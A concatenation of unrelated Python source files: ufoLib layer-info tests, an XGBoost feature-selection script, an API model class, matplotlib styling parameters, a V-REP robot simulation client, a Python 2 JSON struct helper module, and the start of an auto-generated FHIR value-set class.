		writer = UFOWriter(self.dstDir, formatVersion=3)
		writer.copyFromReader(reader, dataPath, dataPath)
		path = os.path.join(self.dstDir, dataPath)
		self.assertEqual(os.path.exists(path), True)
		self.tearDownUFO()
		# copy a directory
		reader = UFOReader(sourceDir)
		writer = UFOWriter(self.dstDir, formatVersion=3)
		p = "data/org.unifiedfontobject.copy"
		writer.copyFromReader(reader, p, p)
		path = os.path.join(self.dstDir, dataPath)
		self.assertEqual(os.path.exists(path), True)
		self.tearDownUFO()
# ---------------
# layerinfo.plist
# ---------------
class TestLayerInfoObject(object):

	"""Bare attribute holder used as the target of readLayerInfo /
	the source for writeLayerInfo in the layerinfo.plist tests.

	All attributes default to None.
	"""

	color = None
	guidelines = None
	lib = None
class UFO3ReadLayerInfoTestCase(unittest.TestCase):

	"""Tests for reading glyphs/layerinfo.plist.

	Improvements: ``tempfile.mkdtemp`` replaces the deprecated, race-prone
	``tempfile.mktemp`` + ``os.mkdir`` pair, and testColor — which repeated
	the same five-line check 22 times — is now data driven.
	"""

	def setUp(self):
		# mkdtemp creates the directory atomically; mktemp is deprecated.
		self.tempDir = tempfile.mkdtemp()
		self.ufoPath = os.path.join(self.tempDir, "test.ufo")

	def tearDown(self):
		shutil.rmtree(self.tempDir)

	def makeUFO(self, formatVersion=3, layerInfo=None):
		"""Write a minimal single-layer UFO with the given layerinfo.plist.

		layerInfo defaults to a valid color plus a lib entry.
		"""
		self.clearUFO()
		if not os.path.exists(self.ufoPath):
			os.mkdir(self.ufoPath)
		# metainfo.plist
		metaInfo = dict(creator="test", formatVersion=formatVersion)
		path = os.path.join(self.ufoPath, "metainfo.plist")
		with open(path, "wb") as f:
			writePlist(metaInfo, f)
		# layercontents.plist
		layerContents = [("public.default", "glyphs")]
		path = os.path.join(self.ufoPath, "layercontents.plist")
		with open(path, "wb") as f:
			writePlist(layerContents, f)
		# glyphs directory with a single glyph
		glyphsPath = os.path.join(self.ufoPath, "glyphs")
		os.mkdir(glyphsPath)
		contents = dict(a="a.glif")
		path = os.path.join(glyphsPath, "contents.plist")
		with open(path, "wb") as f:
			writePlist(contents, f)
		path = os.path.join(glyphsPath, "a.glif")
		with open(path, "w") as f:
			f.write(" ")
		# layerinfo.plist
		if layerInfo is None:
			layerInfo = dict(
				color="0,0,0,1",
				lib={"foo" : "bar"}
			)
		path = os.path.join(glyphsPath, "layerinfo.plist")
		with open(path, "wb") as f:
			writePlist(layerInfo, f)

	def clearUFO(self):
		# Remove any UFO a previous makeUFO call left behind.
		if os.path.exists(self.ufoPath):
			shutil.rmtree(self.ufoPath)

	def testValidLayerInfo(self):
		# round trip: the values written by makeUFO come back on the object
		self.makeUFO()
		reader = UFOReader(self.ufoPath)
		glyphSet = reader.getGlyphSet()
		info = TestLayerInfoObject()
		glyphSet.readLayerInfo(info)
		expectedColor = "0,0,0,1"
		self.assertEqual(expectedColor, info.color)
		expectedLib = {"foo": "bar"}
		self.assertEqual(expectedLib, info.lib)

	def testMissingLayerInfo(self):
		# a missing layerinfo.plist is not an error; attributes stay None
		self.makeUFO()
		path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
		os.remove(path)
		# read
		reader = UFOReader(self.ufoPath)
		glyphSet = reader.getGlyphSet()
		info = TestLayerInfoObject()
		glyphSet.readLayerInfo(info)
		self.assertEqual(None, info.color)
		self.assertEqual(None, info.guidelines)
		self.assertEqual(None, info.lib)

	def testBogusLayerInfo(self):
		# an unparseable layerinfo.plist raises GlifLibError
		self.makeUFO()
		path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
		os.remove(path)
		with open(path, "w") as f:
			f.write("test")
		# read
		reader = UFOReader(self.ufoPath)
		glyphSet = reader.getGlyphSet()
		self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())

	def testInvalidFormatLayerInfo(self):
		# layerinfo.plist must hold a dict, not a list
		self.makeUFO()
		path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
		layerInfo = [("color", "0,0,0,0")]
		with open(path, "wb") as f:
			writePlist(layerInfo, f)
		# read
		reader = UFOReader(self.ufoPath)
		glyphSet = reader.getGlyphSet()
		self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())

	def _assertInvalidColor(self, color):
		# A malformed color value must make readLayerInfo raise GlifLibError.
		self.makeUFO(layerInfo={"color": color})
		reader = UFOReader(self.ufoPath)
		glyphSet = reader.getGlyphSet()
		self.assertRaises(GlifLibError, glyphSet.readLayerInfo, TestLayerInfoObject())

	def testColor(self):
		"""Every malformed color value must be rejected."""
		invalidColors = [
			# not a string
			1,
			# not enough commas
			"1 0, 0, 0",
			"1 0 0, 0",
			"1 0 0 0",
			# empty parts
			", 0, 0, 0",
			"1, , 0, 0",
			"1, 0, , 0",
			"1, 0, 0, ",
			", , , ",
			# not a number in each position
			"r, 1, 1, 1",
			"1, g, 1, 1",
			"1, 1, b, 1",
			"1, 1, 1, a",
			# too many parts
			"1, 0, 0, 0, 0",
			# < 0 in each position
			"-1, 0, 0, 0",
			"0, -1, 0, 0",
			"0, 0, -1, 0",
			"0, 0, 0, -1",
			# > 1 in each position
			"2, 0, 0, 0",
			"0, 2, 0, 0",
			"0, 0, 2, 0",
			"0, 0, 0, 2",
		]
		for color in invalidColors:
			self._assertInvalidColor(color)
class UFO3WriteLayerInfoTestCase(unittest.TestCase):
	"""Tests for writing layerinfo.plist through GlyphSet.writeLayerInfo."""

	def setUp(self):
		# NOTE(review): tempfile.mktemp only returns a name (and is
		# deprecated as racy); the directory is created right after.
		self.tempDir = tempfile.mktemp()
		os.mkdir(self.tempDir)
		self.ufoPath = os.path.join(self.tempDir, "test.ufo")

	def tearDown(self):
		shutil.rmtree(self.tempDir)

	def makeGlyphSet(self):
		"""Return a glyph set backed by a freshly created, empty UFO."""
		self.clearUFO()
		writer = UFOWriter(self.ufoPath)
		return writer.getGlyphSet()

	def clearUFO(self):
		if os.path.exists(self.ufoPath):
			shutil.rmtree(self.ufoPath)

	def assertColorWriteFails(self, color):
		"""Assert that writing layer info with *color* raises GlifLibError."""
		info = TestLayerInfoObject()
		info.color = color
		glyphSet = self.makeGlyphSet()
		self.assertRaises(GlifLibError, glyphSet.writeLayerInfo, info)

	def testValidWrite(self):
		expected = dict(
			color="0,0,0,1",
			lib={"foo" : "bar"}
		)
		info = TestLayerInfoObject()
		info.color = expected["color"]
		info.lib = expected["lib"]
		glyphSet = self.makeGlyphSet()
		glyphSet.writeLayerInfo(info)
		path = os.path.join(self.ufoPath, "glyphs", "layerinfo.plist")
		with open(path, "rb") as f:
			result = readPlist(f)
		self.assertEqual(expected, result)

	def testColor(self):
		# not a string
		self.assertColorWriteFails(1)
		# not enough commas
		for color in ("1 0, 0, 0", "1 0 0, 0", "1 0 0 0"):
			self.assertColorWriteFails(color)
		# not enough parts
		for color in (", 0, 0, 0", "1, , 0, 0", "1, 0, , 0", "1, 0, 0, ", ", , , "):
			self.assertColorWriteFails(color)
		# not a number in all positions
		for color in ("r, 1, 1, 1", "1, g, 1, 1", "1, 1, b, 1", "1, 1, 1, a"):
			self.assertColorWriteFails(color)
		# too many parts
		self.assertColorWriteFails("1, 0, 0, 0, 0")
		# < 0 in each position
		for color in ("-1, 0, 0, 0", "0, -1, 0, 0", "0, 0, -1, 0", "0, 0, 0, -1"):
			self.assertColorWriteFails(color)
		# > 1 in each position
		for color in ("2, 0, 0, 0", "0, 2, 0, 0", "0, 0, 2, 0", "0, 0, 0, 2"):
			self.assertColorWriteFails(color)
if __name__ == "__main__":
    # Run this module's test cases when executed directly.
    from ufoLib.test.testSupport import runTests
    runTests()
|
import numpy as np
import pandas as pd
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import MinMaxScaler, MaxAbsScaler, StandardScaler, Normalizer
from sklearn.feature_selection import VarianceThreshold, SelectKBest, RFE
from sklearn.model_selection import cross_val_score
from xgboost import XGBRegressor
def feature_select(data_path="/Users/ashzerm/item/GasOline/data/stand_oline.xlsx",
                   n_features=25):
    """Select gasoline-process features with RFE over an XGBoost regressor.

    Args:
        data_path: Excel file with standardized samples, including the
            'RON_LOSS' target column (defaults to the original hard-coded path).
        n_features: number of features RFE keeps.

    Returns:
        pandas.Index with the names of the selected feature columns.
    """
    df = pd.read_excel(data_path)
    target = np.array(df['RON_LOSS'].copy())
    # Drop the target and the two other outcome columns so only process
    # variables remain as candidate features.
    df.drop('RON_LOSS', axis=1, inplace=True)
    df.drop('产品辛烷值RON', axis=1, inplace=True)
    df.drop('产品硫含量', axis=1, inplace=True)
    data = np.array(df)
    estimator = XGBRegressor(learning_rate=0.1, n_estimators=100, max_depth=5)
    selector = RFE(estimator=estimator, n_features_to_select=n_features)
    selector.fit(data, target)
    print("N_features {}".format(selector.n_features_))
    print("Support is {}".format(selector.support_))
    print("Ranking is {}".format(selector.ranking_))
    # ranking_ == 1 marks the surviving features (equivalent to support_).
    selected = df.columns[selector.ranking_ == 1]
    print("选取的特征为: ", selected)
    return selected
if __name__ == '__main__':
    # Run the RFE feature selection as a standalone script.
    feature_select()
|
# -*- coding: utf-8 -*-
class ConnectOauthOptionsCopy(object):
    """Implementation of the 'ConnectOAuthOptions - Copy' model.

    oauthOptions for oauthEnabled institutions

    Attributes:
        enabled (bool): Indicates if OAuth institutions should be enabled for
            the session
        auto_replace (bool): If set to true, Connect will replace OAuth
            institutions based on the customer's existing accounts. e.g if the
            customer has a legacy Chase account, legacy Chase will be used
            throughout the session but if the user doesn't have a Capital One
            legacy account, OAuth Capital One will be used for the session.
        institutions (object): Provides the ability to control what
            institutions should or shouldn't be displayed to the user

    """

    # Create a mapping from Model property names to API property names
    _names = {
        "enabled":'enabled',
        "auto_replace":'autoReplace',
        "institutions":'institutions'
    }

    def __init__(self,
                 enabled=None,
                 auto_replace=None,
                 institutions=None,
                 additional_properties=None):
        """Constructor for the ConnectOauthOptionsCopy class

        Args:
            enabled (bool, optional): OAuth enabled flag.
            auto_replace (bool, optional): OAuth auto-replace flag.
            institutions (object, optional): Institution display controls.
            additional_properties (dict, optional): Unrecognized API
                properties. Defaults to a fresh empty dict per instance.
        """
        # Initialize members of the class
        self.enabled = enabled
        self.auto_replace = auto_replace
        self.institutions = institutions

        # Bug fix: the original used a mutable default argument ({}), which
        # is shared between all instances constructed without this argument.
        self.additional_properties = {} if additional_properties is None else additional_properties

    @classmethod
    def from_dictionary(cls,
                        dictionary):
        """Creates an instance of this model from a dictionary

        Args:
            dictionary (dictionary): A dictionary representation of the object as
            obtained from the deserialization of the server's response. The keys
            MUST match property names in the API description.

        Returns:
            object: An instance of this structure class.

        """
        if dictionary is None:
            return None

        # Extract variables from the dictionary
        enabled = dictionary.get('enabled')
        auto_replace = dictionary.get('autoReplace')
        institutions = dictionary.get('institutions')

        # Clean out expected properties from dictionary; whatever remains
        # is preserved as additional_properties. NOTE: mutates the caller's
        # dict, matching the original behavior.
        for key in cls._names.values():
            if key in dictionary:
                del dictionary[key]

        # Return an object of this model
        return cls(enabled,
                   auto_replace,
                   institutions,
                   dictionary)
|
# Plot styling parameters — presumably passed to matplotlib's
# rcParams.update() by the caller (TODO confirm against usage site).
params = {
    'axes.labelsize': 12,
    'font.size': 12,
    'savefig.dpi': 1000,
    'axes.spines.right': False,
    'axes.spines.top': False,
    'legend.fontsize': 12,
    'xtick.labelsize': 12,
    'ytick.labelsize': 12,
    'text.usetex': False,
    'legend.labelspacing': 1,
    'legend.borderpad': 0.5,
    'legend.borderaxespad': 0.5,
    'axes.labelpad': 0,
    'axes.linewidth': 0.4,
    'patch.linewidth': 0.7,
    'lines.linewidth': 1,
    'lines.markersize': 8,
    'font.family': 'serif',
    'xtick.major.pad': 1.5,
    'xtick.major.size': 2.5,
    'xtick.major.width': 0.4,
    'xtick.minor.pad': 1.2,
    'xtick.minor.size': 1.5,
    'xtick.minor.width': 0.3,
    'ytick.major.pad': 1.5,
    'ytick.major.size': 2.5,
    'ytick.major.width': 0.4,
    'ytick.minor.pad': 1.2,
    'ytick.minor.size': 1.5,
    'ytick.minor.width': 0.3,
    'font.serif': ["Times New Roman"]
}
|
from __future__ import print_function
import logging
from compas_fab.backends.vrep.helpers import DEFAULT_OP_MODE
from compas_fab.backends.interfaces.client import ClientInterface
from compas_fab.backends.vrep import VrepError
from compas_fab.backends.vrep.helpers import assert_robot
from compas_fab.backends.vrep.helpers import config_from_vrep
from compas_fab.backends.vrep.helpers import config_to_vrep
from compas_fab.backends.vrep.helpers import floats_from_vrep
from compas_fab.backends.vrep.helpers import floats_to_vrep
from compas_fab.backends.vrep.helpers import resolve_host
from compas_fab.backends.vrep.planner import VrepPlanner
from compas_fab.backends.vrep.remote_api import vrep
# Default model scaling: meters.
DEFAULT_SCALE = 1.
# All LUA entry points are implemented as a child script on the V-REP scene.
CHILD_SCRIPT_TYPE = vrep.sim_scripttype_childscript
LOG = logging.getLogger('compas_fab.backends.vrep.client')

__all__ = [
    'VrepClient',
]
class VrepClient(ClientInterface):
    """Interface to run simulations using VREP as
    the engine for kinematics and path planning.

    :class:`.VrepClient` is a context manager type, so it's best used in combination
    with the ``with`` statement to ensure resource deallocation.

    Args:
        host (:obj:`str`): IP address or DNS name of the V-REP simulator.
        port (:obj:`int`): Port of the V-REP simulator.
        scale (:obj:`int`): Scaling of the model. Defaults to meters (``1``).
        lua_script (:obj:`str`): Name of the LUA script on the V-REP scene.
        debug (:obj:`bool`): True to enable debug messages, False otherwise.

    Examples:
        >>> from compas_fab.backends import VrepClient
        >>> with VrepClient() as client:
        ...     print ('Connected: %s' % client.is_connected)
        Connected: True

    Note:
        For more examples, check out the :ref:`V-REP examples page <examples_vrep>`.
    """

    def __init__(self, host='127.0.0.1', port=19997, scale=DEFAULT_SCALE, lua_script='RFL', debug=False):
        super(VrepClient, self).__init__()
        self.client_id = None
        self.host = resolve_host(host)
        self.port = port
        # Very large timeout so blocking commands do not time out mid-run.
        self.default_timeout_in_ms = -50000000
        self.thread_cycle_in_ms = 5
        self.debug = debug
        self.scale = float(scale)
        self.lua_script = lua_script
        self._added_handles = []

        self.planner = VrepPlanner(self)

    def __enter__(self):
        # Stop existing simulation, if any
        vrep.simxFinish(-1)

        if self.debug:
            LOG.debug('Connecting to V-REP on %s:%d...', self.host, self.port)

        # Connect to V-REP, set a very large timeout for blocking commands
        self.client_id = vrep.simxStart(self.host, self.port, True, True,
                                        self.default_timeout_in_ms,
                                        self.thread_cycle_in_ms)

        # Bug fix: check the connection result BEFORE issuing commands.
        # The original called simxStartSimulation with client_id == -1
        # when the connection failed.
        if self.client_id == -1:
            raise VrepError('Unable to connect to V-REP on %s:%d' % (self.host, self.port), -1)

        # Start simulation
        vrep.simxStartSimulation(self.client_id, DEFAULT_OP_MODE)

        return self

    def __exit__(self, *args):
        # Stop simulation
        vrep.simxStopSimulation(self.client_id, DEFAULT_OP_MODE)

        # Close the connection to V-REP
        vrep.simxFinish(self.client_id)
        self.client_id = None

        # Objects are removed by V-REP itself when simulation stops
        self._added_handles = []

        if self.debug:
            LOG.debug('Disconnected from V-REP')

    @property
    def is_connected(self):
        """Indicates whether the client has an active connection.

        Returns:
            bool: True if connected, False otherwise.
        """
        return self.client_id is not None and self.client_id != -1

    def get_object_handle(self, object_name):
        """Gets the object handle (identifier) for a given object name.

        Args:
            object_name (:obj:`str`): Name of the object.

        Returns:
            int: Object handle.
        """
        _res, handle = vrep.simxGetObjectHandle(self.client_id,
                                                object_name,
                                                DEFAULT_OP_MODE)
        return handle

    def get_object_matrices(self, object_handles):
        """Gets a dictionary of matrices keyed by object handle.

        Args:
            object_handles (:obj:`list` of :obj:`float`): List of object handles (identifiers)
                to retrieve matrices from.

        Returns:
            dict: Dictionary of matrices represented by a :obj:`list` of 12 :obj:`float` values.

        Examples:
            >>> from compas_fab.backends import VrepClient
            >>> with VrepClient() as client:
            ...     matrices = client.get_object_matrices([0])
            ...     print([int(i) for i in matrices[0]])   # doctest: +SKIP
            [0, 0, 0, 19, 0, 0, 0, 10, 0, 0, 0, 6]         # doctest: +SKIP

        .. note::
            The resulting dictionary is keyed by object handle.
        """
        # The LUA side returns all matrices flattened; split into runs of 12.
        _res, _, matrices, _, _ = self.run_child_script('getShapeMatrices', object_handles, [], [])
        return dict([(object_handles[i // 12], floats_from_vrep(matrices[i:i + 12], self.scale)) for i in range(0, len(matrices), 12)])

    def get_all_visible_handles(self):
        """Gets a list of object handles (identifiers) for all visible
        shapes of the 3D model.

        Returns:
            list: List of object handles (identifiers) of the 3D model.
        """
        return self.run_child_script('getRobotVisibleShapeHandles', [], [], [])[1]

    def set_robot_metric(self, group, metric_values):
        """Assigns a metric defining relations between axis values of a robot.

        It takes a list containing one value per configurable joint. Each value
        ranges from 0 to 1, where 1 indicates the axis is blocked and cannot
        move during inverse kinematic solving. A value of 1 on any of these
        effectively removes one degree of freedom (DOF).

        Args:
            group (:obj:`int`): Robot group index.
            metric_values (:obj:`list` of :obj:`float`): List containing one value
                per configurable joint. Each value ranges from 0 to 1.
        """
        vrep.simxCallScriptFunction(self.client_id,
                                    self.lua_script,
                                    CHILD_SCRIPT_TYPE, 'setTheMetric',
                                    [group], metric_values, [],
                                    bytearray(), DEFAULT_OP_MODE)

    def set_robot_pose(self, robot, frame):
        """Moves the robot to a given pose, specified as a frame.

        Args:
            robot (:class:`compas_fab.robots.Robot`): Robot instance to move.
            frame (:class:`Frame`): Target or goal frame.

        Returns:
            An instance of :class:`Configuration` found for the given pose.

        Raises:
            ValueError: If no valid configuration is found for the pose.
        """
        assert_robot(robot)

        # First check if the start state is reachable (no joints blocked)
        joints = len(robot.get_configurable_joints())
        options = {
            'num_joints': joints,
            'metric_values': [0.] * joints,
        }

        config = self.inverse_kinematics(robot, frame, group=robot.model.attr['index'], options=options)[-1]

        if not config:
            raise ValueError('Cannot find a valid config for the given pose')

        self.set_robot_config(robot, config)

        return config

    def set_robot_config(self, robot, config):
        """Moves the robot to the specified configuration.

        Args:
            robot (:class:`compas_fab.robots.Robot`): Robot instance to move.
            config (:class:`Configuration` instance): Describes the position of the
                robot as an instance of :class:`Configuration`.

        Examples:
            >>> from compas_fab.robots import *
            >>> with VrepClient() as client:
            ...     config = Configuration.from_prismatic_and_revolute_values([7.600, -4.500, -5.500],
            ...                                                               to_radians([90, 0, 0, 0, 0, -90]))
            ...     client.set_robot_config(rfl.Robot('A'), config)
            ...
        """
        assert_robot(robot)

        if not config:
            raise ValueError('Unsupported config value')

        values = config_to_vrep(config, self.scale)

        # Unblock all joints before moving
        self.set_robot_metric(robot.model.attr['index'], [0.0] * len(config.values))
        self.run_child_script('moveRobotFK',
                              [], values, ['robot' + robot.name])

    def get_robot_config(self, robot):
        """Gets the current configuration of the specified robot.

        Args:
            robot (:class:`compas_fab.robots.Robot`): Robot instance.

        Examples:
            >>> from compas_fab.robots import *
            >>> with VrepClient() as client:
            ...     config = client.get_robot_config(rfl.Robot('A'))

        Returns:
            An instance of :class:`.Configuration`.
        """
        assert_robot(robot)
        _res, _, config, _, _ = self.run_child_script('getRobotState',
                                                      [robot.model.attr['index']],
                                                      [], [])
        return config_from_vrep(config, self.scale)

    def find_raw_robot_states(self, group, goal_vrep_pose, gantry_joint_limits, arm_joint_limits, max_trials=None, max_results=1):
        """Searches raw robot states for a goal pose, retrying until found
        (bounded to 20 attempts) when no trial limit is given."""
        i = 0
        final_states = []
        # When no trial limit is given, keep retrying until states are found.
        retry_until_success = not max_trials

        while True:
            string_param_list = []
            if gantry_joint_limits or arm_joint_limits:
                joint_limits = []
                joint_limits.extend(floats_to_vrep(gantry_joint_limits or [], self.scale))
                joint_limits.extend(arm_joint_limits or [])
                string_param_list.append(','.join(map(str, joint_limits)))

            res, _, states, _, _ = self.run_child_script('searchRobotStates',
                                                         [group,
                                                          max_trials or 1,
                                                          max_results],
                                                         goal_vrep_pose, string_param_list)

            # Even if the retry_until_success is set to True, we short circuit
            # at some point to prevent infinite loops caused by misconfiguration
            i += 1
            if i > 20 or (res != 0 and not retry_until_success):
                raise VrepError('Failed to search robot states', res)

            final_states.extend(states)

            if len(final_states):
                # Each state is 9 floats on the LUA side.
                LOG.info('Found %d valid robot states', len(final_states) // 9)
                break
            else:
                LOG.info('No valid robot states found, will retry.')
        return final_states

    def run_child_script(self, function_name, in_ints, in_floats, in_strings):
        """Invokes *function_name* on the scene's LUA child script."""
        return vrep.simxCallScriptFunction(self.client_id,
                                           self.lua_script,
                                           CHILD_SCRIPT_TYPE, function_name,
                                           in_ints, in_floats, in_strings,
                                           bytearray(), DEFAULT_OP_MODE)
|
"""
=== SODI container objects prototype ===
version 1
All data is stored as text in json format. Helper functions and classes are
provided in this module together with usage documentation.
See also func calling demo at the end of this file.
*** Compatible with dbdict (dict with items accessible via attributes)
>>> x = Struct()
>>> x.field1 = 'test'
>>> x['field1']
'test'
*** Object can automatically be built from json, using class method from_json
>>> x = Struct.from_json('{"field2":42, "field3":{"field4":"foo"}}')
>>> x.field2
42
*** Struct data can be dumped to json using method dump_json
>>> x.dump_json()
'{"field2":42,"field3":{"field4":"foo"}}'
*** Sub dicts in json are automatically converted to Struct objects on creation
(note that string values are stored as unicode, that is the standard behaviour
of json)
>>> x.field3.field4 == 'foo'
True
*** Typed structs can be defined using simple class definition syntax. All fields
are instances of Field. Field types are given as arguments to the Field initializer.
When no field type is given, no automatic type conversion takes place
>>> class X(Struct):
... name = Field(str)
... age = Field(int, default=42)
... blah = Field()
>>> x = X()
>>> x.name
''
>>> x.age
42
>>> type(x.blah)
<type 'NoneType'>
**** Structs are inheritable
>>> class Y(X):
... some_value = Field(float)
>>> y = Y()
>>> y.age
42
>>> y.some_value
0.0
*** New combined structs can be built by adding up base structs
>>> class A(Struct):
... name = Field(str, default = 'nobody')
>>> class B(Struct):
... age = Field(int, default = 11)
>>> AB = A + B
>>> ab=AB()
>>> ab.name
'nobody'
>>> ab['age']
11
*** Special "typed" list builder list_of is introduced with method new for
creating (and adding) new typed items
>>> class Item(Struct):
... key = Field(str)
... val = Field(int)
>>> class ItemContainer(Struct):
... name = Field(str)
... itemlist = Field(list_of(Item))
>>> x = ItemContainer(name = 'test')
>>> item = x.itemlist.new()
>>> item.key
''
>>> item.val
0
>>> item.key = 'test-test'
>>> item.val = 42
>>> x.itemlist[0].key
'test-test'
>>> item = x.itemlist.new(key=2, val='100')
>>> x.itemlist[1].val
100
>>> item.key
'2'
*** Helper function for struct building: build_struct. base structs inherit from
can be given as args and fields as keyword args. If ordinary type is used in
place of field, Field object is built automatically, using type as arg
>>> Foo = build_struct(name = Field(str, default='nobody'), age = int)
>>> foo = Foo()
>>> foo.name
'nobody'
>>> foo.age
0
>>> Foo1 = build_struct(Foo, data = build_struct(lines=list_of(build_struct(nr=int, line=str))))
>>> foo1 = Foo1()
>>> line = foo1.data.lines.new(nr=1, line='line1')
>>> foo1['data'].lines[0].line
'line1'
>>> foo1.name
'nobody'
"""
#from pdb import set_trace
__all__ = ['loads', 'dumps', 'Struct', 'build_struct', 'Field', 'list_of']
#===============================================================================
# Portable JSON import
#===============================================================================
import sys
# python2.5 'json' is crap, try simplejson first
try:
import simplejson as json
except ImportError:
# python tries to do relative import first, work around it
import sys
__import__('json', level=0)
json = sys.modules['json']
if hasattr(json, 'dumps'):
dumps = json.dumps
loads = json.loads
else:
# python2.5-json
dumps = getattr(json, 'write')
loads = getattr(json, 'read')
#===============================================================================
# Inherited stuff (defined here now to eliminate dependencies)
#===============================================================================
class dbdict(dict):
    """use dbdict from skytools instead for maximum compatibility"""

    def __getattr__(self, name):
        # Attribute access is plain item access; missing keys raise KeyError.
        return self[name]

    def __setattr__(self, name, value):
        self[name] = value

    def __delattr__(self, name):
        del self[name]
#===============================================================================
# Magic that makes everything work
#===============================================================================
class _MetaStruct(type):
    """Builds struct classes with field initialization and type conversion
    based on descriptions (Struct and its subclasses)
    """
    # NOTE: Python 2 only — uses dict.iteritems below.
    def __new__(cls, name, bases, attrs):
        # Split the class body into Field descriptors (_fields) and
        # ordinary attributes (_attrs).
        _fields = {}
        _attrs = {}
        for attrname, attr in attrs.items():
            if isinstance(attr, Field):
                _fields[attrname] = attr
            #elif not attrname.startswith('__'):
            #    _fields[attrname] = Field(attr)
            else:
                _attrs[attrname] = attr
        # Closure over _fields: item assignment routes the value through the
        # Field converter so declared fields always carry the declared type.
        def __setitem__(self, k, v):
            if k in _fields:
                v = _fields[k](k, v)
            dbdict.__setitem__(self, k, v)
        def __init__(self, *p, **kw):
            for base in bases:
                base.__init__(self, *p, **kw)
            for fieldname, field in _fields.iteritems():
                # if fieldname is not given to init then use default
                # when default is not set, use ancestor's default
                if fieldname not in kw and field.default:
                    val = field(fieldname)
                else:
                    val = field(fieldname, self.get(fieldname))
                self[fieldname] = val
            # Undeclared sub-dicts/lists (e.g. parsed json) become generic
            # Structs / lists of Structs.
            for key, val in self.iteritems():
                if not key in _fields:
                    if type(val) == dict:
                        self[key] = Struct(val)
                    elif type(val) == list:
                        self[key] = list_of(Struct)(val)
        def validate(self):
            # NOTE(review): validate is defined but never added to _attrs
            # below, so it is NOT attached to the built class — possibly a
            # latent bug; confirm intent before relying on it.
            for base in bases:
                err = base.validate(self)
                if err:
                    return err
            for k in _fields.keys():
                if k not in self:
                    return 'field %s missing in json' % k
        _attrs.update({'__init__': __init__, '__setitem__':__setitem__})
        return super(_MetaStruct, cls).__new__(cls, name, bases, _attrs)
    def __init__(self, name, bases, attrs):
        super(_MetaStruct, self).__init__(name, bases, attrs)
    def __add__(self, other):
        # `A + B` builds a combined struct class inheriting from both.
        return type('CombinedStruct', (self, other), {})
#===============================================================================
# Building blocks
#===============================================================================
class Field(object):
    """Struct field definition: an optional target type plus an optional
    default (which may be a zero-arg factory callable)."""

    def __init__(self, type = None, default = None):
        self.type = type
        self.default = default

    def __call__(self, name, value = None):
        """Resolve and coerce *value* for the field named *name*."""
        if value is None:
            if self.default is None:
                raise Exception('Field "%s" not set' % name)
            # Defaults given as callables (e.g. lambdas) are evaluated lazily.
            value = self.default() if callable(self.default) else self.default
        if self.type is not None and type(value) != self.type:
            # Falsy values fall back to the type's no-arg constructor
            # (e.g. '' -> int() == 0), matching the original behavior.
            value = self.type(value) if value else self.type()
        return value
class Struct(dbdict):
    """Base class. All structure components must inherit or
    instantiate Struct. Magic happens in metaclass.
    """
    __metaclass__ = _MetaStruct  # Python 2 metaclass hook
    @classmethod
    def from_json(cls, jsonstr):
        """creates object from json string"""
        return cls(loads(jsonstr))
    def dump_json(self):
        """dumps object to json string"""
        return dumps(self)
    def getas(self, name, cast = None, default = None):
        """get value by name with optional casting and default"""
        value = self.get(name, default)
        # NOTE: the cast is applied to the default value too.
        if cast:
            value = cast(value)
        return value
#===============================================================================
# Helpers and builders
#===============================================================================
def list_of(itemtype):
    """Build a list subclass whose members are coerced to *itemtype*.

    The returned class also provides ``new(*p, **kw)``, which constructs an
    *itemtype* instance, appends it and returns it.
    """
    class ListHandler(list):
        def __init__(self, *args):
            list.__init__(self, *args)
            # Coerce raw members (e.g. dicts parsed from json) in place.
            for idx, member in enumerate(self):
                if not isinstance(member, itemtype):
                    self[idx] = itemtype(member)

        def new(self, *args, **kw):
            member = itemtype(*args, **kw)
            self.append(member)
            return member

    return ListHandler
def build_struct(*p, **kw):
    """Struct subclass building helper.

    Positional args are base classes (defaults to ``(Struct,)``); keyword
    args are fields. Plain types given in place of a Field are wrapped into
    ``Field(type)`` automatically.

    Fix: use ``dict.items()`` instead of the Python-2-only ``iteritems()``
    so the helper works on both Python 2 and 3.
    """
    return type('BuildStruct',
                p or (Struct,),
                dict((k, v if isinstance(v, Field) else Field(v))
                     for k, v in kw.items()))
#===============================================================================
# DEMO
#===============================================================================
def func_call_example():
    """Function call is simulated, using argument defining, json string creation
    and result processing
    """
    # Shared call/result scaffolding built from typed Structs.
    class Context(Struct):
        username = Field(str, default = lambda: 'egon')
    class AbstractCall(Struct):
        func = Field(str)
        context = Field(Context)
    class AbstractResult(Struct):
        code = Field(int, default = 200)
        msg = Field(str, default = 'OK')
    # testcall with json as arg and result
    def func_call(json_arg):
        call = AbstractCall.from_json(json_arg)
        assert call.func == 'public.test'
        assert call.context.username == 'egon'
        assert call.params.hostname == 'dub-db1'
        Row = build_struct(id = Field(int), value = Field(str))
        Result = build_struct(AbstractResult,
            rows = Field(list_of(Row)),
            created = Field(str, default = lambda: __import__('datetime').datetime.now()))
        result = Result()
        # Several equivalent ways of appending typed rows:
        result.rows.new(id = 1, value = 'a')
        row = result.rows.new()
        row.id = 2
        row.value = 'b'
        row = result.rows.new(id = 3)
        row.value = 'c'
        result.rows.new({'id':4, 'value':'d'})
        return result.dump_json()
    # define concrete func call
    Params = build_struct(hostname = Field(str), ip = Field(str))
    Call = build_struct(AbstractCall, params = Field(Params))
    call = Call()
    call.func = 'public.test'
    call.params.hostname = 'dub-db1'
    call.params.ip ='192.168.1.1'
    # create json, call and parse result json
    # NOTE: Python 2 print statements — this module is Python 2 only.
    json_call_str = call.dump_json()
    print json_call_str
    json_result_str = func_call(json_call_str)
    print json_result_str
    result = AbstractResult.from_json(json_result_str)
    assert result.code == 200
    assert result.msg == 'OK'
    assert len(result.rows) == 4
    assert result.rows[0].id == 1
if __name__ == '__main__':
    # Run the doctests embedded in the module docstring, then the demo.
    import doctest
    doctest.testmod()
    func_call_example()
|
from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class AdjudicationErrorCodesCode(GenericTypeCode):
    """
    Adjudication Error Codes
